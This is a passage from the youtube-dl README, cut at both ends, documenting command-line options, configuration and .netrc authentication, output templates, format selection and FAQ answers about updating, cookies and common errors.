--sleep-interval SECONDS Number of seconds to sleep before each download when used alone or a lower bound of a range for randomized sleep before each download (minimum possible number of seconds to sleep) when used along with --max-sleep-interval. --max-sleep-interval SECONDS Upper bound of a range for randomized sleep before each download (maximum possible number of seconds to sleep). Must only be used along with --min-sleep-interval. ## Video Format Options: -f, --format FORMAT Video format code, see the "FORMAT SELECTION" for all the info --all-formats Download all available video formats --prefer-free-formats Prefer free video formats unless a specific one is requested -F, --list-formats List all available formats of requested videos --youtube-skip-dash-manifest Do not download the DASH manifests and related data on YouTube videos --merge-output-format FORMAT If a merge is required (e.g. bestvideo+bestaudio), output to given container format. One of mkv, mp4, ogg, webm, flv. Ignored if no merge is required ## Subtitle Options: --write-sub Write subtitle file --write-auto-sub Write automatically generated subtitle file (YouTube only) --all-subs Download all the available subtitles of the video --list-subs List all available subtitles for the video --sub-format FORMAT Subtitle format, accepts formats preference, for example: "srt" or "ass/srt/best" --sub-lang LANGS Languages of the subtitles to download (optional) separated by commas, use --list- subs for available language tags ## Authentication Options: -u, --username USERNAME Login with this account ID -p, --password PASSWORD Account password. If this option is left out, youtube-dl will ask interactively. -2, --twofactor TWOFACTOR Two-factor authentication code -n, --netrc Use .netrc authentication data --video-password PASSWORD Video password (vimeo, youku) ## Adobe Pass Options: --ap-mso MSO Adobe Pass multiple-system operator (TV provider) identifier, use --ap-list-mso for a list of available MSOs --ap-username USERNAME Multiple-system operator account login --ap-password PASSWORD Multiple-system operator account password. If this option is left out, youtube-dl will ask interactively. --ap-list-mso List all supported multiple-system operators ## Post-processing Options: -x, --extract-audio Convert video files to audio-only files (requires ffmpeg or avconv and ffprobe or avprobe) --audio-format FORMAT Specify audio format: "best", "aac", "flac", "mp3", "m4a", "opus", "vorbis", or "wav"; "best" by default; No effect without -x --audio-quality QUALITY Specify ffmpeg/avconv audio quality, insert a value between 0 (better) and 9 (worse) for VBR or a specific bitrate like 128K (default 5) --recode-video FORMAT Encode the video to another format if necessary (currently supported: mp4|flv|ogg|webm|mkv|avi) --postprocessor-args ARGS Give these arguments to the postprocessor -k, --keep-video Keep the video file on disk after the post- processing; the video is erased by default --no-post-overwrites Do not overwrite post-processed files; the post-processed files are overwritten by default --embed-subs Embed subtitles in the video (only for mp4, webm and mkv videos) --embed-thumbnail Embed thumbnail in the audio as cover art --add-metadata Write metadata to the video file --metadata-from-title FORMAT Parse additional metadata like song title / artist from the video title. The format syntax is the same as --output. Regular expression with named capture groups may also be used. The parsed parameters replace existing values. Example: --metadata-from- title "%(artist)s - %(title)s" matches a title like "Coldplay - Paradise". Example (regex): --metadata-from-title "(?P<artist>.+?) - (?P<title>.+)" --xattrs Write metadata to the video file's xattrs (using dublin core and xdg standards) --fixup POLICY Automatically correct known faults of the file. One of never (do nothing), warn (only emit a warning), detect_or_warn (the default; fix file if we can, warn otherwise) --prefer-avconv Prefer avconv over ffmpeg for running the postprocessors --prefer-ffmpeg Prefer ffmpeg over avconv for running the postprocessors (default) --ffmpeg-location PATH Location of the ffmpeg/avconv binary; either the path to the binary or its containing directory. --exec CMD Execute a command on the file after downloading and post-processing, similar to find's -exec syntax. Example: --exec 'adb push {} /sdcard/Music/ && rm {}' --convert-subs FORMAT Convert the subtitles to other format (currently supported: srt|ass|vtt|lrc) # CONFIGURATION You can configure youtube-dl by placing any supported command line option to a configuration file. On Linux and macOS, the system wide configuration file is located at `/etc/youtube-dl.conf` and the user wide configuration file at `~/.config/youtube-dl/config`. On Windows, the user wide configuration file locations are `%APPDATA%\youtube-dl\config.txt` or `C:\Users\<user name>\youtube-dl.conf`. Note that by default configuration file may not exist so you may need to create it yourself. For example, with the following configuration file youtube-dl will always extract the audio, not copy the mtime, use a proxy and save all videos under `Movies` directory in your home directory: ``` # Lines starting with # are comments # Always extract audio -x # Do not copy the mtime --no-mtime # Use this proxy --proxy 127.0.0.1:3128 # Save all videos under Movies directory in your home directory -o ~/Movies/%(title)s.%(ext)s ``` Note that options in configuration file are just the same options aka switches used in regular command line calls thus there **must be no whitespace** after `-` or `--`, e.g. `-o` or `--proxy` but not `- o` or `-- proxy`. You can use `--ignore-config` if you want to disable the configuration file for a particular youtube-dl run. You can also use `--config-location` if you want to use custom configuration file for a particular youtube-dl run. ### Authentication with `.netrc` file You may also want to configure automatic credentials storage for extractors that support authentication (by providing login and password with `--username` and `--password`) in order not to pass credentials as command line arguments on every youtube-dl execution and prevent tracking plain text passwords in the shell command history. You can achieve this using a [`.netrc` file](https://stackoverflow.com/tags/.netrc/info) on a per extractor basis. For that you will need to create a `.netrc` file in your `$HOME` and restrict permissions to read/write by only you: ``` touch $HOME/.netrc chmod a-rwx,u+rw $HOME/.netrc ``` After that you can add credentials for an extractor in the following format, where *extractor* is the name of the extractor in lowercase: ``` machine <extractor> login <login> password <password> ``` For example: ``` machine youtube login [email protected] password my_youtube_password machine twitch login my_twitch_account_name password my_twitch_password ``` To activate authentication with the `.netrc` file you should pass `--netrc` to youtube-dl or place it in the [configuration file](#configuration). On Windows you may also need to setup the `%HOME%` environment variable manually. For example: ``` set HOME=%USERPROFILE% ``` # OUTPUT TEMPLATE The `-o` option allows users to indicate a template for the output file names. **tl;dr:** [navigate me to examples](#output-template-examples). The basic usage is not to set any template arguments when downloading a single file, like in `youtube-dl -o funny_video.flv "https://some/video"`. However, it may contain special sequences that will be replaced when downloading each video. The special sequences may be formatted according to [python string formatting operations](https://docs.python.org/2/library/stdtypes.html#string-formatting). For example, `%(NAME)s` or `%(NAME)05d`. To clarify, that is a percent symbol followed by a name in parentheses, followed by formatting operations. Allowed names along with sequence type are: - `id` (string): Video identifier - `title` (string): Video title - `url` (string): Video URL - `ext` (string): Video filename extension - `alt_title` (string): A secondary title of the video - `display_id` (string): An alternative identifier for the video - `uploader` (string): Full name of the video uploader - `license` (string): License name the video is licensed under - `creator` (string): The creator of the video - `release_date` (string): The date (YYYYMMDD) when the video was released - `timestamp` (numeric): UNIX timestamp of the moment the video became available - `upload_date` (string): Video upload date (YYYYMMDD) - `uploader_id` (string): Nickname or id of the video uploader - `channel` (string): Full name of the channel the video is uploaded on - `channel_id` (string): Id of the channel - `location` (string): Physical location where the video was filmed - `duration` (numeric): Length of the video in seconds - `view_count` (numeric): How many users have watched the video on the platform - `like_count` (numeric): Number of positive ratings of the video - `dislike_count` (numeric): Number of negative ratings of the video - `repost_count` (numeric): Number of reposts of the video - `average_rating` (numeric): Average rating give by users, the scale used depends on the webpage - `comment_count` (numeric): Number of comments on the video - `age_limit` (numeric): Age restriction for the video (years) - `is_live` (boolean): Whether this video is a live stream or a fixed-length video - `start_time` (numeric): Time in seconds where the reproduction should start, as specified in the URL - `end_time` (numeric): Time in seconds where the reproduction should end, as specified in the URL - `format` (string): A human-readable description of the format - `format_id` (string): Format code specified by `--format` - `format_note` (string): Additional info about the format - `width` (numeric): Width of the video - `height` (numeric): Height of the video - `resolution` (string): Textual description of width and height - `tbr` (numeric): Average bitrate of audio and video in KBit/s - `abr` (numeric): Average audio bitrate in KBit/s - `acodec` (string): Name of the audio codec in use - `asr` (numeric): Audio sampling rate in Hertz - `vbr` (numeric): Average video bitrate in KBit/s - `fps` (numeric): Frame rate - `vcodec` (string): Name of the video codec in use - `container` (string): Name of the container format - `filesize` (numeric): The number of bytes, if known in advance - `filesize_approx` (numeric): An estimate for the number of bytes - `protocol` (string): The protocol that will be used for the actual download - `extractor` (string): Name of the extractor - `extractor_key` (string): Key name of the extractor - `epoch` (numeric): Unix epoch when creating the file - `autonumber` (numeric): Number that will be increased with each download, starting at `--autonumber-start` - `playlist` (string): Name or id of the playlist that contains the video - `playlist_index` (numeric): Index of the video in the playlist padded with leading zeros according to the total length of the playlist - `playlist_id` (string): Playlist identifier - `playlist_title` (string): Playlist title - `playlist_uploader` (string): Full name of the playlist uploader - `playlist_uploader_id` (string): Nickname or id of the playlist uploader Available for the video that belongs to some logical chapter or section: - `chapter` (string): Name or title of the chapter the video belongs to - `chapter_number` (numeric): Number of the chapter the video belongs to - `chapter_id` (string): Id of the chapter the video belongs to Available for the video that is an episode of some series or programme: - `series` (string): Title of the series or programme the video episode belongs to - `season` (string): Title of the season the video episode belongs to - `season_number` (numeric): Number of the season the video episode belongs to - `season_id` (string): Id of the season the video episode belongs to - `episode` (string): Title of the video episode - `episode_number` (numeric): Number of the video episode within a season - `episode_id` (string): Id of the video episode Available for the media that is a track or a part of a music album: - `track` (string): Title of the track - `track_number` (numeric): Number of the track within an album or a disc - `track_id` (string): Id of the track - `artist` (string): Artist(s) of the track - `genre` (string): Genre(s) of the track - `album` (string): Title of the album the track belongs to - `album_type` (string): Type of the album - `album_artist` (string): List of all artists appeared on the album - `disc_number` (numeric): Number of the disc or other physical medium the track belongs to - `release_year` (numeric): Year (YYYY) when the album was released Each aforementioned sequence when referenced in an output template will be replaced by the actual value corresponding to the sequence name. Note that some of the sequences are not guaranteed to be present since they depend on the metadata obtained by a particular extractor. Such sequences will be replaced with placeholder value provided with `--output-na-placeholder` (`NA` by default). For example for `-o %(title)s-%(id)s.%(ext)s` and an mp4 video with title `youtube-dl test video` and id `BaW_jenozKcj`, this will result in a `youtube-dl test video-BaW_jenozKcj.mp4` file created in the current directory. For numeric sequences you can use numeric related formatting, for example, `%(view_count)05d` will result in a string with view count padded with zeros up to 5 characters, like in `00042`. Output templates can also contain arbitrary hierarchical path, e.g. `-o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s'` which will result in downloading each video in a directory corresponding to this path template. Any missing directory will be automatically created for you. To use percent literals in an output template use `%%`. To output to stdout use `-o -`. The current default template is `%(title)s-%(id)s.%(ext)s`. In some cases, you don't want special characters such as 中, spaces, or &, such as when transferring the downloaded filename to a Windows system or the filename through an 8bit-unsafe channel. In these cases, add the `--restrict-filenames` flag to get a shorter title: #### Output template and Windows batch files If you are using an output template inside a Windows batch file then you must escape plain percent characters (`%`) by doubling, so that `-o "%(title)s-%(id)s.%(ext)s"` should become `-o "%%(title)s-%%(id)s.%%(ext)s"`. However you should not touch `%`'s that are not plain characters, e.g. environment variables for expansion should stay intact: `-o "C:\%HOMEPATH%\Desktop\%%(title)s.%%(ext)s"`. #### Output template examples Note that on Windows you may need to use double quotes instead of single. ```bash $ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc youtube-dl test video ''_ä↭𝕐.mp4 # All kinds of weird characters $ youtube-dl --get-filename -o '%(title)s.%(ext)s' BaW_jenozKc --restrict-filenames youtube-dl_test_video_.mp4 # A simple file name # Download YouTube playlist videos in separate directory indexed by video order in a playlist $ youtube-dl -o '%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re # Download all playlists of YouTube channel/user keeping each playlist in separate directory: $ youtube-dl -o '%(uploader)s/%(playlist)s/%(playlist_index)s - %(title)s.%(ext)s' https://www.youtube.com/user/TheLinuxFoundation/playlists # Download Udemy course keeping each chapter in separate directory under MyVideos directory in your home $ youtube-dl -u user -p password -o '~/MyVideos/%(playlist)s/%(chapter_number)s - %(chapter)s/%(title)s.%(ext)s' https://www.udemy.com/java-tutorial/ # Download entire series season keeping each series and each season in separate directory under C:/MyVideos $ youtube-dl -o "C:/MyVideos/%(series)s/%(season_number)s - %(season)s/%(episode_number)s - %(episode)s.%(ext)s" https://videomore.ru/kino_v_detalayah/5_sezon/367617 # Stream the video being downloaded to stdout $ youtube-dl -o - BaW_jenozKc ``` # FORMAT SELECTION By default youtube-dl tries to download the best available quality, i.e. if you want the best quality you **don't need** to pass any special options, youtube-dl will guess it for you by **default**. But sometimes you may want to download in a different format, for example when you are on a slow or intermittent connection. The key mechanism for achieving this is so-called *format selection* based on which you can explicitly specify desired format, select formats based on some criterion or criteria, setup precedence and much more. The general syntax for format selection is `--format FORMAT` or shorter `-f FORMAT` where `FORMAT` is a *selector expression*, i.e. an expression that describes format or formats you would like to download. **tl;dr:** [navigate me to examples](#format-selection-examples). The simplest case is requesting a specific format, for example with `-f 22` you can download the format with format code equal to 22. You can get the list of available format codes for particular video using `--list-formats` or `-F`. Note that these format codes are extractor specific. You can also use a file extension (currently `3gp`, `aac`, `flv`, `m4a`, `mp3`, `mp4`, `ogg`, `wav`, `webm` are supported) to download the best quality format of a particular file extension served as a single file, e.g. `-f webm` will download the best quality format with the `webm` extension served as a single file. You can also use special names to select particular edge case formats: - `best`: Select the best quality format represented by a single file with video and audio. - `worst`: Select the worst quality format represented by a single file with video and audio. - `bestvideo`: Select the best quality video-only format (e.g. DASH video). May not be available. - `worstvideo`: Select the worst quality video-only format. May not be available. - `bestaudio`: Select the best quality audio only-format. May not be available. - `worstaudio`: Select the worst quality audio only-format. May not be available. For example, to download the worst quality video-only format you can use `-f worstvideo`. If you want to download multiple videos and they don't have the same formats available, you can specify the order of preference using slashes. Note that slash is left-associative, i.e. formats on the left hand side are preferred, for example `-f 22/17/18` will download format 22 if it's available, otherwise it will download format 17 if it's available, otherwise it will download format 18 if it's available, otherwise it will complain that no suitable formats are available for download. If you want to download several formats of the same video use a comma as a separator, e.g. `-f 22,17,18` will download all these three formats, of course if they are available. Or a more sophisticated example combined with the precedence feature: `-f 136/137/mp4/bestvideo,140/m4a/bestaudio`. You can also filter the video formats by putting a condition in brackets, as in `-f "best[height=720]"` (or `-f "[filesize>10M]"`). The following numeric meta fields can be used with comparisons `<`, `<=`, `>`, `>=`, `=` (equals), `!=` (not equals): - `filesize`: The number of bytes, if known in advance - `width`: Width of the video, if known - `height`: Height of the video, if known - `tbr`: Average bitrate of audio and video in KBit/s - `abr`: Average audio bitrate in KBit/s - `vbr`: Average video bitrate in KBit/s - `asr`: Audio sampling rate in Hertz - `fps`: Frame rate Also filtering work for comparisons `=` (equals), `^=` (starts with), `$=` (ends with), `*=` (contains) and following string meta fields: - `ext`: File extension - `acodec`: Name of the audio codec in use - `vcodec`: Name of the video codec in use - `container`: Name of the container format - `protocol`: The protocol that will be used for the actual download, lower-case (`http`, `https`, `rtsp`, `rtmp`, `rtmpe`, `mms`, `f4m`, `ism`, `http_dash_segments`, `m3u8`, or `m3u8_native`) - `format_id`: A short description of the format - `language`: Language code Any string comparison may be prefixed with negation `!` in order to produce an opposite comparison, e.g. `!*=` (does not contain). Note that none of the aforementioned meta fields are guaranteed to be present since this solely depends on the metadata obtained by particular extractor, i.e. the metadata offered by the video hoster. Formats for which the value is not known are excluded unless you put a question mark (`?`) after the operator. You can combine format filters, so `-f "[height <=? 720][tbr>500]"` selects up to 720p videos (or videos where the height is not known) with a bitrate of at least 500 KBit/s. You can merge the video and audio of two formats into a single file using `-f <video-format>+<audio-format>` (requires ffmpeg or avconv installed), for example `-f bestvideo+bestaudio` will download the best video-only format, the best audio-only format and mux them together with ffmpeg/avconv. Format selectors can also be grouped using parentheses, for example if you want to download the best mp4 and webm formats with a height lower than 480 you can use `-f '(mp4,webm)[height<480]'`. Since the end of April 2015 and version 2015.04.26, youtube-dl uses `-f bestvideo+bestaudio/best` as the default format selection (see [#5447](https://github.com/ytdl-org/youtube-dl/issues/5447), [#5456](https://github.com/ytdl-org/youtube-dl/issues/5456)). If ffmpeg or avconv are installed this results in downloading `bestvideo` and `bestaudio` separately and muxing them together into a single file giving the best overall quality available. Otherwise it falls back to `best` and results in downloading the best available quality served as a single file. `best` is also needed for videos that don't come from YouTube because they don't provide the audio and video in two different files. If you want to only download some DASH formats (for example if you are not interested in getting videos with a resolution higher than 1080p), you can add `-f bestvideo[height<=?1080]+bestaudio/best` to your configuration file. Note that if you use youtube-dl to stream to `stdout` (and most likely to pipe it to your media player then), i.e. you explicitly specify output template as `-o -`, youtube-dl still uses `-f best` format selection in order to start content delivery immediately to your player and not to wait until `bestvideo` and `bestaudio` are downloaded and muxed. If you want to preserve the old format selection behavior (prior to youtube-dl 2015.04.26), i.e. you want to download the best available quality media served as a single file, you should explicitly specify your choice with `-f best`. You may want to add it to the [configuration file](#configuration) in order not to type it every time you run youtube-dl. #### Format selection examples Note that on Windows you may need to use double quotes instead of single. ```bash # Download best mp4 format available or any other best if no mp4 available $ youtube-dl -f 'bestvideo[ext=mp4]+bestaudio[ext=m4a]/best[ext=mp4]/best' # Download best format available but no better than 480p $ youtube-dl -f 'bestvideo[height<=480]+bestaudio/best[height<=480]' # Download best video only format but no bigger than 50 MB $ youtube-dl -f 'best[filesize<50M]' # Download best format available via direct link over HTTP/HTTPS protocol $ youtube-dl -f '(bestvideo+bestaudio/best)[protocol^=http]' # Download the best video format and the best audio format without merging them $ youtube-dl -f 'bestvideo,bestaudio' -o '%(title)s.f%(format_id)s.%(ext)s' ``` Note that in the last example, an output template is recommended as bestvideo and bestaudio may have the same file name. # VIDEO SELECTION Videos can be filtered by their upload date using the options `--date`, `--datebefore` or `--dateafter`. They accept dates in two formats: - Absolute dates: Dates in the format `YYYYMMDD`. - Relative dates: Dates in the format `(now|today)[+-][0-9](day|week|month|year)(s)?` Examples: ```bash # Download only the videos uploaded in the last 6 months $ youtube-dl --dateafter now-6months # Download only the videos uploaded on January 1, 1970 $ youtube-dl --date 19700101 $ # Download only the videos uploaded in the 200x decade $ youtube-dl --dateafter 20000101 --datebefore 20091231 ``` # FAQ ### How do I update youtube-dl? If you've followed [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html), you can simply run `youtube-dl -U` (or, on Linux, `sudo youtube-dl -U`). If you have used pip, a simple `sudo pip install -U youtube-dl` is sufficient to update. If you have installed youtube-dl using a package manager like *apt-get* or *yum*, use the standard system update mechanism to update. Note that distribution packages are often outdated. As a rule of thumb, youtube-dl releases at least once a month, and often weekly or even daily. Simply go to https://yt-dl.org to find out the current version. Unfortunately, there is nothing we youtube-dl developers can do if your distribution serves a really outdated version. You can (and should) complain to your distribution in their bugtracker or support forum. As a last resort, you can also uninstall the version installed by your package manager and follow our manual installation instructions. For that, remove the distribution's package, with a line like sudo apt-get remove -y youtube-dl Afterwards, simply follow [our manual installation instructions](https://ytdl-org.github.io/youtube-dl/download.html): ``` sudo wget https://yt-dl.org/downloads/latest/youtube-dl -O /usr/local/bin/youtube-dl sudo chmod a+rx /usr/local/bin/youtube-dl hash -r ``` Again, from then on you'll be able to update with `sudo youtube-dl -U`. ### youtube-dl is extremely slow to start on Windows Add a file exclusion for `youtube-dl.exe` in Windows Defender settings. ### I'm getting an error `Unable to extract OpenGraph title` on YouTube playlists YouTube changed their playlist format in March 2014 and later on, so you'll need at least youtube-dl 2014.07.25 to download all YouTube videos. If you have installed youtube-dl with a package manager, pip, setup.py or a tarball, please use that to update. Note that Ubuntu packages do not seem to get updated anymore. Since we are not affiliated with Ubuntu, there is little we can do. Feel free to [report bugs](https://bugs.launchpad.net/ubuntu/+source/youtube-dl/+filebug) to the [Ubuntu packaging people](mailto:[email protected]?subject=outdated%20version%20of%20youtube-dl) - all they have to do is update the package to a somewhat recent version. See above for a way to update. ### I'm getting an error when trying to use output template: `error: using output template conflicts with using title, video ID or auto number` Make sure you are not using `-o` with any of these options `-t`, `--title`, `--id`, `-A` or `--auto-number` set in command line or in a configuration file. Remove the latter if any. ### Do I always have to pass `-citw`? By default, youtube-dl intends to have the best options (incidentally, if you have a convincing case that these should be different, [please file an issue where you explain that](https://yt-dl.org/bug)). Therefore, it is unnecessary and sometimes harmful to copy long option strings from webpages. In particular, the only option out of `-citw` that is regularly useful is `-i`. ### Can you please put the `-b` option back? Most people asking this question are not aware that youtube-dl now defaults to downloading the highest available quality as reported by YouTube, which will be 1080p or 720p in some cases, so you no longer need the `-b` option. For some specific videos, maybe YouTube does not report them to be available in a specific high quality format you're interested in. In that case, simply request it with the `-f` option and youtube-dl will try to download it. ### I get HTTP error 402 when trying to download a video. What's this? Apparently YouTube requires you to pass a CAPTCHA test if you download too much. We're [considering to provide a way to let you solve the CAPTCHA](https://github.com/ytdl-org/youtube-dl/issues/154), but at the moment, your best course of action is pointing a web browser to the youtube URL, solving the CAPTCHA, and restart youtube-dl. ### Do I need any other programs? youtube-dl works fine on its own on most sites. However, if you want to convert video/audio, you'll need [avconv](https://libav.org/) or [ffmpeg](https://www.ffmpeg.org/). On some sites - most notably YouTube - videos can be retrieved in a higher quality format without sound. youtube-dl will detect whether avconv/ffmpeg is present and automatically pick the best option. Videos or video formats streamed via RTMP protocol can only be downloaded when [rtmpdump](https://rtmpdump.mplayerhq.hu/) is installed. Downloading MMS and RTSP videos requires either [mplayer](https://mplayerhq.hu/) or [mpv](https://mpv.io/) to be installed. ### I have downloaded a video but how can I play it? Once the video is fully downloaded, use any video player, such as [mpv](https://mpv.io/), [vlc](https://www.videolan.org/) or [mplayer](https://www.mplayerhq.hu/). ### I extracted a video URL with `-g`, but it does not play on another machine / in my web browser. It depends a lot on the service. In many cases, requests for the video (to download/play it) must come from the same IP address and with the same cookies and/or HTTP headers. Use the `--cookies` option to write the required cookies into a file, and advise your downloader to read cookies from that file. Some sites also require a common user agent to be used, use `--dump-user-agent` to see the one in use by youtube-dl. You can also get necessary cookies and HTTP headers from JSON output obtained with `--dump-json`. It may be beneficial to use IPv6; in some cases, the restrictions are only applied to IPv4. Some services (sometimes only for a subset of videos) do not restrict the video URL by IP address, cookie, or user-agent, but these are the exception rather than the rule. Please bear in mind that some URL protocols are **not** supported by browsers out of the box, including RTMP. If you are using `-g`, your own downloader must support these as well. If you want to play the video on a machine that is not running youtube-dl, you can relay the video content from the machine that runs youtube-dl. You can use `-o -` to let youtube-dl stream a video to stdout, or simply allow the player to download the files written by youtube-dl in turn. ### ERROR: no fmt_url_map or conn information found in video info YouTube has switched to a new video info format in July 2011 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### ERROR: unable to download video YouTube requires an additional signature since September 2012 which is not supported by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### Video URL contains an ampersand and I'm getting some strange output `[1] 2839` or `'v' is not recognized as an internal or external command` That's actually the output from your shell. Since ampersand is one of the special shell characters it's interpreted by the shell preventing you from passing the whole URL to youtube-dl. To disable your shell from interpreting the ampersands (or any other special characters) you have to either put the whole URL in quotes or escape them with a backslash (which approach will work depends on your shell). For example if your URL is https://www.youtube.com/watch?t=4&v=BaW_jenozKc you should end up with following command: ```youtube-dl 'https://www.youtube.com/watch?t=4&v=BaW_jenozKc'``` or ```youtube-dl https://www.youtube.com/watch?t=4\&v=BaW_jenozKc``` For Windows you have to use the double quotes: ```youtube-dl "https://www.youtube.com/watch?t=4&v=BaW_jenozKc"``` ### ExtractorError: Could not find JS function u'OF' In February 2015, the new YouTube player contained a character sequence in a string that was misinterpreted by old versions of youtube-dl. See [above](#how-do-i-update-youtube-dl) for how to update youtube-dl. ### HTTP Error 429: Too Many Requests or 402: Payment Required These two error codes indicate that the service is blocking your IP address because of overuse. Usually this is a soft block meaning that you can gain access again after solving CAPTCHA. Just open a browser and solve a CAPTCHA the service suggests you and after that [pass cookies](#how-do-i-pass-cookies-to-youtube-dl) to youtube-dl. Note that if your machine has multiple external IPs then you should also pass exactly the same IP you've used for solving CAPTCHA with [`--source-address`](#network-options). Also you may need to pass a `User-Agent` HTTP header of your browser with [`--user-agent`](#workarounds). If this is not the case (no CAPTCHA suggested to solve by the service) then you can contact the service and ask them to unblock your IP address, or - if you have acquired a whitelisted IP address already - use the [`--proxy` or `--source-address` options](#network-options) to select another IP address. ### SyntaxError: Non-ASCII character The error File "youtube-dl", line 2 SyntaxError: Non-ASCII character '\x93' ... means you're using an outdated version of Python. Please update to Python 2.6 or 2.7. ### What is this binary file? Where has the code gone? Since June 2012 ([#342](https://github.com/ytdl-org/youtube-dl/issues/342)) youtube-dl is packed as an executable zipfile, simply unzip it (might need renaming to `youtube-dl.zip` first on some systems) or clone the git repository, as laid out above. If you modify the code, you can run it by executing the `__main__.py` file. To recompile the executable, run `make youtube-dl`. ### The exe throws an error due to missing `MSVCR100.dll` To run the exe you need to install first the [Microsoft Visual C++ 2010 Redistributable Package (x86)](https://www.microsoft.com/en-US/download/details.aspx?id=5555). ### On Windows, how should I set up ffmpeg and youtube-dl? Where should I put the exe files? If you put youtube-dl and ffmpeg in the same directory that you're running the command from, it will work, but that's rather cumbersome. To make a different directory work - either for ffmpeg, or for youtube-dl, or for both - simply create the directory (say, `C:\bin`, or `C:\Users\<User name>\bin`), put all the executables directly in there, and then [set your PATH environment variable](https://www.java.com/en/download/help/path.xml) to include that directory. From then on, after restarting your shell, you will be able to access both youtube-dl and ffmpeg (and youtube-dl will be able to find ffmpeg) by simply typing `youtube-dl` or `ffmpeg`, no matter what directory you're in. ### How do I put downloads into a specific folder? Use the `-o` to specify an [output template](#output-template), for example `-o "/home/user/videos/%(title)s-%(id)s.%(ext)s"`. If you want this for all of your downloads, put the option into your [configuration file](#configuration). ### How do I download a video starting with a `-`? Either prepend `https://www.youtube.com/watch?v=` or separate the ID from the options with `--`: youtube-dl -- -wNyEUrxzFU youtube-dl "https://www.youtube.com/watch?v=-wNyEUrxzFU" ### How do I pass cookies to youtube-dl? Use the `--cookies` option, for example `--cookies /path/to/cookies/file.txt`. In order to extract cookies from browser use any conforming browser extension for exporting cookies. For example, [Get cookies.txt](https://chrome.google.com/webstore/detail/get-cookiestxt/bgaddhkoddajcdgocldbbfleckgcbcid/) (for Chrome) or [cookies.txt](https://addons.mozilla.org/en-US/firefox/addon/cookies-txt/) (for Firefox). Note that the cookies file must be in Mozilla/Netscape format and the first line of the cookies file must be either `# HTTP Cookie File` or `# Netscape HTTP Cookie File`. Make sure you have correct [newline format](https://en.wikipedia.org/wiki/Newline) in the cookies file and convert newlines if necessary to correspond with your OS, namely `CRLF` (`\r\n`) for Windows and `LF` (`\n`) for Unix and Unix-like systems (Linux, macOS, etc.). `HTTP Error 400: Bad Request` when using `--cookies` is a good sign of invalid newline format. Passing cookies to youtube-dl is a good way to workaround login when a particular extractor does not implement it explicitly. Another use case is working around [CAPTCHA](https://en.wikipedia.org/wiki/CAPTCHA) some websites require you to solve in particular cases in order to get access (e.g. YouTube, CloudFlare). ### How do I stream directly to media player? You will first need to tell youtube-dl to stream media to stdout with `-o -`, and also tell your media player to read from stdin (it must be capable of this for streaming) and then pipe former to latter. For example, streaming to [vlc](https://www.videolan.org/) can be achieved with: youtube-dl -o - "https://www.youtube.com/watch?v=BaW_jenozKcj" | vlc - ### How do I download only new videos from a playlist? Use download-archive feature. With this feature you should initially download the complete playlist with `--download-archive /path/to/download/archive/file.txt` that will record identifiers of all the videos in a special file. Each subsequent run with the same `--download-archive` will download only new videos and skip all videos that have been downloaded before. Note that only successful downloads are recorded in the file. For example, at first, youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" will download the complete `PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re` playlist and create a file `archive.txt`. Each subsequent run will only download new videos if any: youtube-dl --download-archive archive.txt "https://www.youtube.com/playlist?list=PLwiyx1dc3P2JR9N8gQaQN_BCvlSlap7re" ### Should I add `--hls-prefer-native` into my config? When youtube-dl detects an HLS video, it can download it either with the built-in downloader or ffmpeg. Since many HLS streams are slightly invalid and ffmpeg/youtube-dl each handle some invalid cases better than the other, there is an option to switch the downloader if needed. When youtube-dl knows that one particular downloader works better for a given website, that downloader will be picked. Otherwise, youtube-dl will pick the best downloader for general compatibility, which at the moment happens to be ffmpeg. This choice may change in future versions of youtube-dl, with improvements of the built-in downloader and/or ffmpeg. In particular, the generic extractor (used when your website is not in the [list of supported sites by youtube-dl](https://ytdl-org.github.io/youtube-dl/supportedsites.html) cannot mandate one specific downloader. If you put either `--hls-prefer-native` or `--hls-prefer-ffmpeg` into your configuration, a different subset of videos will fail to download correctly. Instead, it is much better to [file an issue](https://yt-dl.org/bug) or a pull request which details why the native or the ffmpeg HLS downloader is a better choice for your use case. ### Can you add support for this anime video site, or site which shows current movies for free? As a matter of policy (as well as legality), youtube-dl does not include support for services that specialize in infringing copyright. As a rule of thumb, if you cannot easily find a video that the service is quite obviously allowed to distribute (i.e. that has been uploaded by the creator, the creator's distributor, or is published under a free license), the service is probably unfit for inclusion to youtube-dl. A note on the service that they don't host the infringing content, but just link to those who do, is evidence that the service should **not** be included into youtube-dl. The same goes for any DMCA note when the whole front page of the service is filled with videos they are not allowed to distribute. A "fair use" note is equally unconvincing if the service shows copyright-protected videos in full without authorization. Support requests for services that **do** purchase the rights to distribute their content are perfectly fine though. If in doubt, you can simply include a source that mentions the legitimate purchase of content. ### How can I speed up work on my issue? (Also known as: Help, my important issue not being solved!) The youtube-dl core developer team is quite small. While we do our best to solve as many issues as possible, sometimes that can take quite a while. To speed up your issue, here's what you can do: First of all, please do report the issue [at our issue tracker](https://yt-dl.org/bugs). That allows us to coordinate all efforts by users and developers, and serves as a unified point. Unfortunately, the youtube-dl project has grown too large to use personal email as an effective communication channel. Please read the [bug reporting instructions](#bugs) below. A lot of bugs lack all the necessary information. If you can, offer proxy, VPN, or shell access to the youtube-dl developers. If you are able to, test the issue from multiple computers in multiple countries to exclude local censorship or misconfiguration issues. If nobody is interested in solving your issue, you are welcome to take matters into your own hands and submit a pull request (or coerce/pay somebody else to do so). Feel free to bump the issue from time to time by writing a small comment ("Issue is still present in youtube-dl version ...from France, but fixed from Belgium"), but please not more than once a month. Please do not declare your issue as `important` or `urgent`. ### How can I detect whether a given URL is supported by youtube-dl? For one, have a look at the [list of supported sites](docs/supportedsites.md). Note that it can sometimes happen that the site changes its URL scheme (say, from https://example.com/video/1234567 to https://example.com/v/1234567 ) and youtube-dl reports an URL of a service in that list as unsupported. In that case, simply report a bug. It is *not* possible to detect whether a URL is supported or not. That's because youtube-dl contains a generic extractor which matches **all** URLs. You may be tempted to disable, exclude, or remove the generic extractor, but the generic extractor not 